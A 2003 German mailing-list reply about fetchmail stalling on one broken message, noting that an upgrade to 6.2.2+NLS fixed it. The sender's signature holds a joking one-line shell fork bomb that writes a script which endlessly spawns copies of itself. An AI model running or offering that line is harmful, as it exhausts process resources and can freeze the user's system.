[linux-l] fetchmail: message delimiter found while scanning head

Volker Mueller volker at flinux.in-berlin.de
So Sep 7 11:04:58 CEST 2003

On Sat, Sep 06, 2003 at 10:30:41PM +0200, Gerhard Marx wrote:
> Hallo Liste,
>
> hier die Lösung :-|

> In /var/log/messages ist mir aufgefallen, dass es immer wieder die gleiche
> Mail ist, an der der "poll" hängenbleibt. Also bin ich hingegangen und habe
> über die WebOberfläche von web.de die Mails aufgeräumt, die ungefähr zu der
> Zeit der ersten Fehlermeldung kamen. Ich weis jetzt zwar nicht, woran es
> genau gelegen hat, aber seit die Mail gelöscht ist funktioniert das Abrufen
> der Mails wieder :-)

Mein aelteres fetchmail brach auch beim ersten Fehler vollstaendig ab.
Ein Update auf release 6.2.2+NLS brachte den Erfolg, dass nur die kaputte
Mail auf dem Server liegenblieb, der Rest aber brav nach Hause kam.

Gruss, Volker

> in Köln

IN-Berlin - aehm in Berlin ;-)

--
Volker Mueller
volker at flinux:~> echo sh _\& sh _\& > _; sh _ # Bomben zu Bierhumpen!